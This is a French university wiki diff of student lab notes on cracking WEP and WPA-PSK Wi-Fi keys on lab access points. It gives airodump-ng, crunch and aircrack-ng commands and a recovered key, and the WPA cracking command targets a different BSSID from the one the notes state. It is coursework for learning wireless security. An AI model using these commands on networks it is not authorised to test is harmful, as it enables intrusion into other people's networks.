« Atelier SysRes SE5 2023/2024 E3 » : différence entre les versions

De wiki-se.plil.fr
Aller à la navigation Aller à la recherche
Aucun résumé des modifications
Ligne 14 : Ligne 14 :


       
       




Ligne 54 : Ligne 48 :




Création d'un dictionnaire à l'aide de crunch
Création d'un dictionnaire à l'aide de crunch<syntaxhighlight lang="bash">
 
crunch 8 8 0123456789 dico.txt  $Création du dico  
 
</syntaxhighlight>
crunch 8 8 0123456789 dico.txt  $Création du dico
 
On créé un dictionnaire pour l'utiliser par la suite


On créé un dictionnaire pour l'utiliser par la suite <syntaxhighlight lang="bash">
airodump-ng --bssid 44:AD:D9:5F:87:09 -w output_10 wlan0mon $Récupération des paquets WiFi
airodump-ng --bssid 44:AD:D9:5F:87:09 -w output_10 wlan0mon $Récupération des paquets WiFi
[[Fichier:Blou.jpg|gauche|vignette]]
</syntaxhighlight>[[Fichier:Blou.jpg|gauche|vignette]]




Ligne 70 : Ligne 62 :




 
<syntaxhighlight lang="bash">
 
aircrack-ng -b 40:A5:EF:05:9A:28 -w dico.txt output_10*.cap
aircrack-ng -b 40:A5:EF:05:9A:28 -w dico.txt output_10*.cap
</syntaxhighlight>

Version du 16 janvier 2024 à 16:50

Groupe Elias et Mathis : (Baloo pour la machine mandataire)


Nous utilisons la cracotte4 et kracoote4

Cassage de clef WEP : "cracotte4"

On lance la commande :

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:53 -w output wlan0mon
PR.jpg


       



On laisse tourner jusqu'à obtenir 75 000 datas de manière à avoir plus de chance de trouver la clé lors du craquage.


On va lancer la commande pour le craquage :

 aircrack-ng -b 04:DA:D2:9C:50:53 output*.cap
PR2.jpg





La clé a été trouvé très vite :

KEY FOUND! [ FF:FF:FF:FF:FA:BC:05:CB:AE:EE:EE:EE:EE ]

Cassage de clef WPA-PSK : "kracotte4"

WiFi : kracotte04


BSSID : 44:AD:D9:5F:87:09


Création d'un dictionnaire à l'aide de crunch

 crunch 8 8 0123456789 dico.txt  $Création du dico

On créé un dictionnaire pour l'utiliser par la suite

airodump-ng --bssid 44:AD:D9:5F:87:09 -w output_10 wlan0mon $Récupération des paquets WiFi
Blou.jpg


On a besoin d'au moins 250 000 Data, on laisse donc tourner jusque là


aircrack-ng -b 40:A5:EF:05:9A:28 -w dico.txt output_10*.cap